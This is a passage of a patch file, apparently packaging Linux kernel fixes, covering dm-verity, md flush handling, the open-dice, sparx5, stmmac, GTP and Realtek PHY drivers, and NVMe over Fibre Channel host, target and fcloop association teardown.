+ 					     cur_block, NULL, &start) == 0) {
+@@ -928,6 +984,10 @@ static void verity_dtr(struct dm_target *ti)
+ 	if (v->verify_wq)
+ 		destroy_workqueue(v->verify_wq);
+ 
++	mempool_exit(&v->recheck_pool);
++	if (v->io)
++		dm_io_client_destroy(v->io);
++
+ 	if (v->bufio)
+ 		dm_bufio_client_destroy(v->bufio);
+ 
+@@ -1364,6 +1424,20 @@ static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	}
+ 	v->hash_blocks = hash_position;
+ 
++	r = mempool_init_page_pool(&v->recheck_pool, 1, 0);
++	if (unlikely(r)) {
++		ti->error = "Cannot allocate mempool";
++		goto bad;
++	}
++
++	v->io = dm_io_client_create();
++	if (IS_ERR(v->io)) {
++		r = PTR_ERR(v->io);
++		v->io = NULL;
++		ti->error = "Cannot allocate dm io";
++		goto bad;
++	}
++
+ 	v->bufio = dm_bufio_client_create(v->hash_dev->bdev,
+ 		1 << v->hash_dev_block_bits, 1, sizeof(struct buffer_aux),
+ 		dm_bufio_alloc_callback, NULL,
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f3f6070084196..4620a98c99561 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -11,6 +11,7 @@
+ #ifndef DM_VERITY_H
+ #define DM_VERITY_H
+ 
++#include <linux/dm-io.h>
+ #include <linux/dm-bufio.h>
+ #include <linux/device-mapper.h>
+ #include <linux/interrupt.h>
+@@ -68,6 +69,9 @@ struct dm_verity {
+ 	unsigned long *validated_blocks; /* bitset blocks validated */
+ 
+ 	char *signature_key_desc; /* signature keyring reference */
++
++	struct dm_io_client *io;
++	mempool_t recheck_pool;
+ };
+ 
+ struct dm_verity_io {
+@@ -84,6 +88,8 @@ struct dm_verity_io {
+ 
+ 	struct work_struct work;
+ 
++	char *recheck_buffer;
++
+ 	/*
+ 	 * Three variably-size fields follow this struct:
+ 	 *
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index c7efe15229514..846bdee4daa0e 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -564,8 +564,12 @@ static void submit_flushes(struct work_struct *ws)
+ 			rcu_read_lock();
+ 		}
+ 	rcu_read_unlock();
+-	if (atomic_dec_and_test(&mddev->flush_pending))
++	if (atomic_dec_and_test(&mddev->flush_pending)) {
++		/* The pair is percpu_ref_get() from md_flush_request() */
++		percpu_ref_put(&mddev->active_io);
++
+ 		queue_work(md_wq, &mddev->flush_work);
++	}
+ }
+ 
+ static void md_submit_flush_data(struct work_struct *ws)
+diff --git a/drivers/misc/open-dice.c b/drivers/misc/open-dice.c
+index c61be3404c6f2..504b836a7abf8 100644
+--- a/drivers/misc/open-dice.c
++++ b/drivers/misc/open-dice.c
+@@ -142,7 +142,6 @@ static int __init open_dice_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	*drvdata = (struct open_dice_drvdata){
+-		.lock = __MUTEX_INITIALIZER(drvdata->lock),
+ 		.rmem = rmem,
+ 		.misc = (struct miscdevice){
+ 			.parent	= dev,
+@@ -152,6 +151,7 @@ static int __init open_dice_probe(struct platform_device *pdev)
+ 			.mode	= 0600,
+ 		},
+ 	};
++	mutex_init(&drvdata->lock);
+ 
+ 	/* Index overflow check not needed, misc_register() will fail. */
+ 	snprintf(drvdata->name, sizeof(drvdata->name), DRIVER_NAME"%u", dev_idx++);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 3784347b6fd88..55639c133dd02 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -437,6 +437,10 @@ static void npc_fixup_vf_rule(struct rvu *rvu, struct npc_mcam *mcam,
+ 			return;
+ 	}
+ 
++	/* AF modifies given action iff PF/VF has requested for it */
++	if ((entry->action & 0xFULL) != NIX_RX_ACTION_DEFAULT)
++		return;
++
+ 	/* copy VF default entry action to the VF mcam entry */
+ 	rx_action = npc_get_default_entry_action(rvu, mcam, blkaddr,
+ 						 target_func);
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+index 3423c95cc84ae..7031f41287e09 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+@@ -744,6 +744,7 @@ static int mchp_sparx5_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, sparx5);
+ 	sparx5->pdev = pdev;
+ 	sparx5->dev = &pdev->dev;
++	spin_lock_init(&sparx5->tx_lock);
+ 
+ 	/* Do switch core reset if available */
+ 	reset = devm_reset_control_get_optional_shared(&pdev->dev, "switch");
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.h b/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
+index 7a83222caa737..cb3173d2b0e8d 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.h
+@@ -278,6 +278,7 @@ struct sparx5 {
+ 	int xtr_irq;
+ 	/* Frame DMA */
+ 	int fdma_irq;
++	spinlock_t tx_lock; /* lock for frame transmission */
+ 	struct sparx5_rx rx;
+ 	struct sparx5_tx tx;
+ 	/* PTP */
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c b/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
+index 6db6ac6a3bbc2..ac7e1cffbcecf 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_packet.c
+@@ -244,10 +244,12 @@ netdev_tx_t sparx5_port_xmit_impl(struct sk_buff *skb, struct net_device *dev)
+ 	}
+ 
+ 	skb_tx_timestamp(skb);
++	spin_lock(&sparx5->tx_lock);
+ 	if (sparx5->fdma_irq > 0)
+ 		ret = sparx5_fdma_xmit(sparx5, ifh, skb);
+ 	else
+ 		ret = sparx5_inject(sparx5, ifh, skb, dev);
++	spin_unlock(&sparx5->tx_lock);
+ 
+ 	if (ret == -EBUSY)
+ 		goto busy;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 66178ce6d000e..91b2aa81914ba 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -5823,11 +5823,6 @@ static irqreturn_t stmmac_mac_interrupt(int irq, void *dev_id)
+ 	struct net_device *dev = (struct net_device *)dev_id;
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 
+-	if (unlikely(!dev)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5843,11 +5838,6 @@ static irqreturn_t stmmac_safety_interrupt(int irq, void *dev_id)
+ 	struct net_device *dev = (struct net_device *)dev_id;
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+ 
+-	if (unlikely(!dev)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5869,11 +5859,6 @@ static irqreturn_t stmmac_msi_intr_tx(int irq, void *data)
+ 	dma_conf = container_of(tx_q, struct stmmac_dma_conf, tx_queue[chan]);
+ 	priv = container_of(dma_conf, struct stmmac_priv, dma_conf);
+ 
+-	if (unlikely(!data)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+@@ -5900,11 +5885,6 @@ static irqreturn_t stmmac_msi_intr_rx(int irq, void *data)
+ 	dma_conf = container_of(rx_q, struct stmmac_dma_conf, rx_queue[chan]);
+ 	priv = container_of(dma_conf, struct stmmac_priv, dma_conf);
+ 
+-	if (unlikely(!data)) {
+-		netdev_err(priv->dev, "%s: invalid dev pointer\n", __func__);
+-		return IRQ_NONE;
+-	}
+-
+ 	/* Check if adapter is up */
+ 	if (test_bit(STMMAC_DOWN, &priv->state))
+ 		return IRQ_HANDLED;
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index bace989591f75..937dd9cf4fbaf 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1906,20 +1906,20 @@ static int __init gtp_init(void)
+ 	if (err < 0)
+ 		goto error_out;
+ 
+-	err = genl_register_family(&gtp_genl_family);
++	err = register_pernet_subsys(&gtp_net_ops);
+ 	if (err < 0)
+ 		goto unreg_rtnl_link;
+ 
+-	err = register_pernet_subsys(&gtp_net_ops);
++	err = genl_register_family(&gtp_genl_family);
+ 	if (err < 0)
+-		goto unreg_genl_family;
++		goto unreg_pernet_subsys;
+ 
+ 	pr_info("GTP module loaded (pdp ctx size %zd bytes)\n",
+ 		sizeof(struct pdp_ctx));
+ 	return 0;
+ 
+-unreg_genl_family:
+-	genl_unregister_family(&gtp_genl_family);
++unreg_pernet_subsys:
++	unregister_pernet_subsys(&gtp_net_ops);
+ unreg_rtnl_link:
+ 	rtnl_link_unregister(&gtp_link_ops);
+ error_out:
+diff --git a/drivers/net/phy/realtek.c b/drivers/net/phy/realtek.c
+index 3d99fd6664d7a..70e52d27064ec 100644
+--- a/drivers/net/phy/realtek.c
++++ b/drivers/net/phy/realtek.c
+@@ -414,9 +414,11 @@ static int rtl8211f_config_init(struct phy_device *phydev)
+ 				ERR_PTR(ret));
+ 			return ret;
+ 		}
++
++		return genphy_soft_reset(phydev);
+ 	}
+ 
+-	return genphy_soft_reset(phydev);
++	return 0;
+ }
+ 
+ static int rtl821x_resume(struct phy_device *phydev)
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 177a365b8ec55..3dbf926fd99fd 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -221,11 +221,6 @@ static LIST_HEAD(nvme_fc_lport_list);
+ static DEFINE_IDA(nvme_fc_local_port_cnt);
+ static DEFINE_IDA(nvme_fc_ctrl_cnt);
+ 
+-static struct workqueue_struct *nvme_fc_wq;
+-
+-static bool nvme_fc_waiting_to_unload;
+-static DECLARE_COMPLETION(nvme_fc_unload_proceed);
+-
+ /*
+  * These items are short-term. They will eventually be moved into
+  * a generic FC class. See comments in module init.
+@@ -255,8 +250,6 @@ nvme_fc_free_lport(struct kref *ref)
+ 	/* remove from transport list */
+ 	spin_lock_irqsave(&nvme_fc_lock, flags);
+ 	list_del(&lport->port_list);
+-	if (nvme_fc_waiting_to_unload && list_empty(&nvme_fc_lport_list))
+-		complete(&nvme_fc_unload_proceed);
+ 	spin_unlock_irqrestore(&nvme_fc_lock, flags);
+ 
+ 	ida_free(&nvme_fc_local_port_cnt, lport->localport.port_num);
+@@ -3869,10 +3862,6 @@ static int __init nvme_fc_init_module(void)
+ {
+ 	int ret;
+ 
+-	nvme_fc_wq = alloc_workqueue("nvme_fc_wq", WQ_MEM_RECLAIM, 0);
+-	if (!nvme_fc_wq)
+-		return -ENOMEM;
+-
+ 	/*
+ 	 * NOTE:
+ 	 * It is expected that in the future the kernel will combine
+@@ -3890,7 +3879,7 @@ static int __init nvme_fc_init_module(void)
+ 	ret = class_register(&fc_class);
+ 	if (ret) {
+ 		pr_err("couldn't register class fc\n");
+-		goto out_destroy_wq;
++		return ret;
+ 	}
+ 
+ 	/*
+@@ -3914,8 +3903,6 @@ static int __init nvme_fc_init_module(void)
+ 	device_destroy(&fc_class, MKDEV(0, 0));
+ out_destroy_class:
+ 	class_unregister(&fc_class);
+-out_destroy_wq:
+-	destroy_workqueue(nvme_fc_wq);
+ 
+ 	return ret;
+ }
+@@ -3935,45 +3922,23 @@ nvme_fc_delete_controllers(struct nvme_fc_rport *rport)
+ 	spin_unlock(&rport->lock);
+ }
+ 
+-static void
+-nvme_fc_cleanup_for_unload(void)
++static void __exit nvme_fc_exit_module(void)
+ {
+ 	struct nvme_fc_lport *lport;
+ 	struct nvme_fc_rport *rport;
+-
+-	list_for_each_entry(lport, &nvme_fc_lport_list, port_list) {
+-		list_for_each_entry(rport, &lport->endp_list, endp_list) {
+-			nvme_fc_delete_controllers(rport);
+-		}
+-	}
+-}
+-
+-static void __exit nvme_fc_exit_module(void)
+-{
+ 	unsigned long flags;
+-	bool need_cleanup = false;
+ 
+ 	spin_lock_irqsave(&nvme_fc_lock, flags);
+-	nvme_fc_waiting_to_unload = true;
+-	if (!list_empty(&nvme_fc_lport_list)) {
+-		need_cleanup = true;
+-		nvme_fc_cleanup_for_unload();
+-	}
++	list_for_each_entry(lport, &nvme_fc_lport_list, port_list)
++		list_for_each_entry(rport, &lport->endp_list, endp_list)
++			nvme_fc_delete_controllers(rport);
+ 	spin_unlock_irqrestore(&nvme_fc_lock, flags);
+-	if (need_cleanup) {
+-		pr_info("%s: waiting for ctlr deletes\n", __func__);
+-		wait_for_completion(&nvme_fc_unload_proceed);
+-		pr_info("%s: ctrl deletes complete\n", __func__);
+-	}
++	flush_workqueue(nvme_delete_wq);
+ 
+ 	nvmf_unregister_transport(&nvme_fc_transport);
+ 
+-	ida_destroy(&nvme_fc_local_port_cnt);
+-	ida_destroy(&nvme_fc_ctrl_cnt);
+-
+ 	device_destroy(&fc_class, MKDEV(0, 0));
+ 	class_unregister(&fc_class);
+-	destroy_workqueue(nvme_fc_wq);
+ }
+ 
+ module_init(nvme_fc_init_module);
+diff --git a/drivers/nvme/target/fc.c b/drivers/nvme/target/fc.c
+index 1ab6601fdd5cf..8a02ed63b1566 100644
+--- a/drivers/nvme/target/fc.c
++++ b/drivers/nvme/target/fc.c
+@@ -111,6 +111,8 @@ struct nvmet_fc_tgtport {
+ 	struct nvmet_fc_port_entry	*pe;
+ 	struct kref			ref;
+ 	u32				max_sg_cnt;
++
++	struct work_struct		put_work;
+ };
+ 
+ struct nvmet_fc_port_entry {
+@@ -165,7 +167,7 @@ struct nvmet_fc_tgt_assoc {
+ 	struct nvmet_fc_hostport	*hostport;
+ 	struct nvmet_fc_ls_iod		*rcv_disconn;
+ 	struct list_head		a_list;
+-	struct nvmet_fc_tgt_queue __rcu	*queues[NVMET_NR_QUEUES + 1];
++	struct nvmet_fc_tgt_queue 	*queues[NVMET_NR_QUEUES + 1];
+ 	struct kref			ref;
+ 	struct work_struct		del_work;
+ 	struct rcu_head			rcu;
+@@ -248,6 +250,13 @@ static int nvmet_fc_tgt_a_get(struct nvmet_fc_tgt_assoc *assoc);
+ static void nvmet_fc_tgt_q_put(struct nvmet_fc_tgt_queue *queue);
+ static int nvmet_fc_tgt_q_get(struct nvmet_fc_tgt_queue *queue);
+ static void nvmet_fc_tgtport_put(struct nvmet_fc_tgtport *tgtport);
++static void nvmet_fc_put_tgtport_work(struct work_struct *work)
++{
++	struct nvmet_fc_tgtport *tgtport =
++		container_of(work, struct nvmet_fc_tgtport, put_work);
++
++	nvmet_fc_tgtport_put(tgtport);
++}
+ static int nvmet_fc_tgtport_get(struct nvmet_fc_tgtport *tgtport);
+ static void nvmet_fc_handle_fcp_rqst(struct nvmet_fc_tgtport *tgtport,
+ 					struct nvmet_fc_fcp_iod *fod);
+@@ -359,7 +368,7 @@ __nvmet_fc_finish_ls_req(struct nvmet_fc_ls_req_op *lsop)
+ 
+ 	if (!lsop->req_queued) {
+ 		spin_unlock_irqrestore(&tgtport->lock, flags);
+-		return;
++		goto out_putwork;
+ 	}
+ 
+ 	list_del(&lsop->lsreq_list);
+@@ -372,7 +381,8 @@ __nvmet_fc_finish_ls_req(struct nvmet_fc_ls_req_op *lsop)
+ 				  (lsreq->rqstlen + lsreq->rsplen),
+ 				  DMA_BIDIRECTIONAL);
+ 
+-	nvmet_fc_tgtport_put(tgtport);
++out_putwork:
++	queue_work(nvmet_wq, &tgtport->put_work);
+ }
+ 
+ static int
+@@ -801,14 +811,11 @@ nvmet_fc_alloc_target_queue(struct nvmet_fc_tgt_assoc *assoc,
+ 	if (!queue)
+ 		return NULL;
+ 
+-	if (!nvmet_fc_tgt_a_get(assoc))
+-		goto out_free_queue;
+-
+ 	queue->work_q = alloc_workqueue("ntfc%d.%d.%d", 0, 0,
+ 				assoc->tgtport->fc_target_port.port_num,
+ 				assoc->a_id, qid);
+ 	if (!queue->work_q)
+-		goto out_a_put;
++		goto out_free_queue;
+ 
+ 	queue->qid = qid;
+ 	queue->sqsize = sqsize;
+@@ -830,15 +837,13 @@ nvmet_fc_alloc_target_queue(struct nvmet_fc_tgt_assoc *assoc,
+ 		goto out_fail_iodlist;
+ 
+ 	WARN_ON(assoc->queues[qid]);
+-	rcu_assign_pointer(assoc->queues[qid], queue);
++	assoc->queues[qid] = queue;
+ 
+ 	return queue;
+ 
+ out_fail_iodlist:
+ 	nvmet_fc_destroy_fcp_iodlist(assoc->tgtport, queue);
+ 	destroy_workqueue(queue->work_q);
+-out_a_put:
+-	nvmet_fc_tgt_a_put(assoc);
+ out_free_queue:
+ 	kfree(queue);
+ 	return NULL;
+@@ -851,12 +856,8 @@ nvmet_fc_tgt_queue_free(struct kref *ref)
+ 	struct nvmet_fc_tgt_queue *queue =
+ 		container_of(ref, struct nvmet_fc_tgt_queue, ref);
+ 
+-	rcu_assign_pointer(queue->assoc->queues[queue->qid], NULL);
+-
+ 	nvmet_fc_destroy_fcp_iodlist(queue->assoc->tgtport, queue);
+ 
+-	nvmet_fc_tgt_a_put(queue->assoc);
+-
+ 	destroy_workqueue(queue->work_q);
+ 
+ 	kfree_rcu(queue, rcu);
+@@ -968,7 +969,7 @@ nvmet_fc_find_target_queue(struct nvmet_fc_tgtport *tgtport,
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+ 		if (association_id == assoc->association_id) {
+-			queue = rcu_dereference(assoc->queues[qid]);
++			queue = assoc->queues[qid];
+ 			if (queue &&
+ 			    (!atomic_read(&queue->connected) ||
+ 			     !nvmet_fc_tgt_q_get(queue)))
+@@ -1077,8 +1078,6 @@ nvmet_fc_alloc_hostport(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 		/* new allocation not needed */
+ 		kfree(newhost);
+ 		newhost = match;
+-		/* no new allocation - release reference */
+-		nvmet_fc_tgtport_put(tgtport);
+ 	} else {
+ 		newhost->tgtport = tgtport;
+ 		newhost->hosthandle = hosthandle;
+@@ -1093,13 +1092,28 @@ nvmet_fc_alloc_hostport(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ }
+ 
+ static void
+-nvmet_fc_delete_assoc(struct work_struct *work)
++nvmet_fc_delete_assoc(struct nvmet_fc_tgt_assoc *assoc)
++{
++	nvmet_fc_delete_target_assoc(assoc);
++	nvmet_fc_tgt_a_put(assoc);
++}
++
++static void
++nvmet_fc_delete_assoc_work(struct work_struct *work)
+ {
+ 	struct nvmet_fc_tgt_assoc *assoc =
+ 		container_of(work, struct nvmet_fc_tgt_assoc, del_work);
++	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
+ 
+-	nvmet_fc_delete_target_assoc(assoc);
+-	nvmet_fc_tgt_a_put(assoc);
++	nvmet_fc_delete_assoc(assoc);
++	nvmet_fc_tgtport_put(tgtport);
++}
++
++static void
++nvmet_fc_schedule_delete_assoc(struct nvmet_fc_tgt_assoc *assoc)
++{
++	nvmet_fc_tgtport_get(assoc->tgtport);
++	queue_work(nvmet_wq, &assoc->del_work);
+ }
+ 
+ static struct nvmet_fc_tgt_assoc *
+@@ -1111,6 +1125,9 @@ nvmet_fc_alloc_target_assoc(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 	int idx;
+ 	bool needrandom = true;
+ 
++	if (!tgtport->pe)
++		return NULL;
++
+ 	assoc = kzalloc(sizeof(*assoc), GFP_KERNEL);
+ 	if (!assoc)
+ 		return NULL;
+@@ -1130,7 +1147,7 @@ nvmet_fc_alloc_target_assoc(struct nvmet_fc_tgtport *tgtport, void *hosthandle)
+ 	assoc->a_id = idx;
+ 	INIT_LIST_HEAD(&assoc->a_list);
+ 	kref_init(&assoc->ref);
+-	INIT_WORK(&assoc->del_work, nvmet_fc_delete_assoc);
++	INIT_WORK(&assoc->del_work, nvmet_fc_delete_assoc_work);
+ 	atomic_set(&assoc->terminating, 0);
+ 
+ 	while (needrandom) {
+@@ -1171,13 +1188,18 @@ nvmet_fc_target_assoc_free(struct kref *ref)
+ 	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
+ 	struct nvmet_fc_ls_iod	*oldls;
+ 	unsigned long flags;
++	int i;
++
++	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
++		if (assoc->queues[i])
++			nvmet_fc_delete_target_queue(assoc->queues[i]);
++	}
+ 
+ 	/* Send Disconnect now that all i/o has completed */
+ 	nvmet_fc_xmt_disconnect_assoc(assoc);
+ 
+ 	nvmet_fc_free_hostport(assoc->hostport);
+ 	spin_lock_irqsave(&tgtport->lock, flags);
+-	list_del_rcu(&assoc->a_list);
+ 	oldls = assoc->rcv_disconn;
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 	/* if pending Rcv Disconnect Association LS, send rsp now */
+@@ -1207,7 +1229,7 @@ static void
+ nvmet_fc_delete_target_assoc(struct nvmet_fc_tgt_assoc *assoc)
+ {
+ 	struct nvmet_fc_tgtport *tgtport = assoc->tgtport;
+-	struct nvmet_fc_tgt_queue *queue;
++	unsigned long flags;
+ 	int i, terminating;
+ 
+ 	terminating = atomic_xchg(&assoc->terminating, 1);
+@@ -1216,29 +1238,21 @@ nvmet_fc_delete_target_assoc(struct nvmet_fc_tgt_assoc *assoc)
+ 	if (terminating)
+ 		return;
+ 
++	spin_lock_irqsave(&tgtport->lock, flags);
++	list_del_rcu(&assoc->a_list);
++	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+-	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
+-		rcu_read_lock();
+-		queue = rcu_dereference(assoc->queues[i]);
+-		if (!queue) {
+-			rcu_read_unlock();
+-			continue;
+-		}
++	synchronize_rcu();
+ 
+-		if (!nvmet_fc_tgt_q_get(queue)) {
+-			rcu_read_unlock();
+-			continue;
+-		}
+-		rcu_read_unlock();
+-		nvmet_fc_delete_target_queue(queue);
+-		nvmet_fc_tgt_q_put(queue);
++	/* ensure all in-flight I/Os have been processed */
++	for (i = NVMET_NR_QUEUES; i >= 0; i--) {
++		if (assoc->queues[i])
++			flush_workqueue(assoc->queues[i]->work_q);
+ 	}
+ 
+ 	dev_info(tgtport->dev,
+ 		"{%d:%d} Association deleted\n",
+ 		tgtport->fc_target_port.port_num, assoc->a_id);
+-
+-	nvmet_fc_tgt_a_put(assoc);
+ }
+ 
+ static struct nvmet_fc_tgt_assoc *
+@@ -1414,6 +1428,7 @@ nvmet_fc_register_targetport(struct nvmet_fc_port_info *pinfo,
+ 	kref_init(&newrec->ref);
+ 	ida_init(&newrec->assoc_cnt);
+ 	newrec->max_sg_cnt = template->max_sgl_segments;
++	INIT_WORK(&newrec->put_work, nvmet_fc_put_tgtport_work);
+ 
+ 	ret = nvmet_fc_alloc_ls_iodlist(newrec);
+ 	if (ret) {
+@@ -1491,9 +1506,8 @@ __nvmet_fc_free_assocs(struct nvmet_fc_tgtport *tgtport)
+ 	list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+ 		if (!nvmet_fc_tgt_a_get(assoc))
+ 			continue;
+-		if (!queue_work(nvmet_wq, &assoc->del_work))
+-			/* already deleting - release local reference */
+-			nvmet_fc_tgt_a_put(assoc);
++		nvmet_fc_schedule_delete_assoc(assoc);
++		nvmet_fc_tgt_a_put(assoc);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -1546,9 +1560,8 @@ nvmet_fc_invalidate_host(struct nvmet_fc_target_port *target_port,
+ 			continue;
+ 		assoc->hostport->invalid = 1;
+ 		noassoc = false;
+-		if (!queue_work(nvmet_wq, &assoc->del_work))
+-			/* already deleting - release local reference */
+-			nvmet_fc_tgt_a_put(assoc);
++		nvmet_fc_schedule_delete_assoc(assoc);
++		nvmet_fc_tgt_a_put(assoc);
+ 	}
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+@@ -1580,7 +1593,7 @@ nvmet_fc_delete_ctrl(struct nvmet_ctrl *ctrl)
+ 
+ 		rcu_read_lock();
+ 		list_for_each_entry_rcu(assoc, &tgtport->assoc_list, a_list) {
+-			queue = rcu_dereference(assoc->queues[0]);
++			queue = assoc->queues[0];
+ 			if (queue && queue->nvme_sq.ctrl == ctrl) {
+ 				if (nvmet_fc_tgt_a_get(assoc))
+ 					found_ctrl = true;
+@@ -1592,9 +1605,8 @@ nvmet_fc_delete_ctrl(struct nvmet_ctrl *ctrl)
+ 		nvmet_fc_tgtport_put(tgtport);
+ 
+ 		if (found_ctrl) {
+-			if (!queue_work(nvmet_wq, &assoc->del_work))
+-				/* already deleting - release local reference */
+-				nvmet_fc_tgt_a_put(assoc);
++			nvmet_fc_schedule_delete_assoc(assoc);
++			nvmet_fc_tgt_a_put(assoc);
+ 			return;
+ 		}
+ 
+@@ -1624,6 +1636,8 @@ nvmet_fc_unregister_targetport(struct nvmet_fc_target_port *target_port)
+ 	/* terminate any outstanding associations */
+ 	__nvmet_fc_free_assocs(tgtport);
+ 
++	flush_workqueue(nvmet_wq);
++
+ 	/*
+ 	 * should terminate LS's as well. However, LS's will be generated
+ 	 * at the tail end of association termination, so they likely don't
+@@ -1869,9 +1883,6 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 				sizeof(struct fcnvme_ls_disconnect_assoc_acc)),
+ 			FCNVME_LS_DISCONNECT_ASSOC);
+ 
+-	/* release get taken in nvmet_fc_find_target_assoc */
+-	nvmet_fc_tgt_a_put(assoc);
+-
+ 	/*
+ 	 * The rules for LS response says the response cannot
+ 	 * go back until ABTS's have been sent for all outstanding
+@@ -1886,8 +1897,6 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 	assoc->rcv_disconn = iod;
+ 	spin_unlock_irqrestore(&tgtport->lock, flags);
+ 
+-	nvmet_fc_delete_target_assoc(assoc);
+-
+ 	if (oldls) {
+ 		dev_info(tgtport->dev,
+ 			"{%d:%d} Multiple Disconnect Association LS's "
+@@ -1903,6 +1912,9 @@ nvmet_fc_ls_disconnect(struct nvmet_fc_tgtport *tgtport,
+ 		nvmet_fc_xmt_ls_rsp(tgtport, oldls);
+ 	}
+ 
++	nvmet_fc_schedule_delete_assoc(assoc);
++	nvmet_fc_tgt_a_put(assoc);
++
+ 	return false;
+ }
+ 
+@@ -2539,8 +2551,9 @@ nvmet_fc_handle_fcp_rqst(struct nvmet_fc_tgtport *tgtport,
+ 
+ 	fod->req.cmd = &fod->cmdiubuf.sqe;
+ 	fod->req.cqe = &fod->rspiubuf.cqe;
+-	if (tgtport->pe)
+-		fod->req.port = tgtport->pe->port;
++	if (!tgtport->pe)
++		goto transport_error;
++	fod->req.port = tgtport->pe->port;
+ 
+ 	/* clear any response payload */
+ 	memset(&fod->rspiubuf, 0, sizeof(fod->rspiubuf));
+@@ -2901,6 +2914,9 @@ nvmet_fc_remove_port(struct nvmet_port *port)
+ 
+ 	nvmet_fc_portentry_unbind(pe);
+ 
++	/* terminate any outstanding associations */
++	__nvmet_fc_free_assocs(pe->tgtport);
++
+ 	kfree(pe);
+ }
+ 
+@@ -2932,6 +2948,9 @@ static int __init nvmet_fc_init_module(void)
+ 
+ static void __exit nvmet_fc_exit_module(void)
+ {
++	/* ensure any shutdown operation, e.g. delete ctrls have finished */
++	flush_workqueue(nvmet_wq);
++
+ 	/* sanity check - all lports should be removed */
+ 	if (!list_empty(&nvmet_fc_target_list))
+ 		pr_warn("%s: targetport list not empty\n", __func__);
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index c780af36c1d4a..f5b8442b653db 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -358,7 +358,7 @@ fcloop_h2t_ls_req(struct nvme_fc_local_port *localport,
+ 	if (!rport->targetport) {
+ 		tls_req->status = -ECONNREFUSED;
+ 		spin_lock(&rport->lock);
+-		list_add_tail(&rport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &rport->ls_list);
+ 		spin_unlock(&rport->lock);
+ 		queue_work(nvmet_wq, &rport->ls_work);
+ 		return ret;
+@@ -391,7 +391,7 @@ fcloop_h2t_xmt_ls_rsp(struct nvmet_fc_target_port *targetport,
+ 	if (remoteport) {
+ 		rport = remoteport->private;
+ 		spin_lock(&rport->lock);
+-		list_add_tail(&rport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &rport->ls_list);
+ 		spin_unlock(&rport->lock);
+ 		queue_work(nvmet_wq, &rport->ls_work);
+ 	}
+@@ -446,7 +446,7 @@ fcloop_t2h_ls_req(struct nvmet_fc_target_port *targetport, void *hosthandle,
+ 	if (!tport->remoteport) {
+ 		tls_req->status = -ECONNREFUSED;
+ 		spin_lock(&tport->lock);
+-		list_add_tail(&tport->ls_list, &tls_req->ls_list);
++		list_add_tail(&tls_req->ls_list, &tport->ls_list);
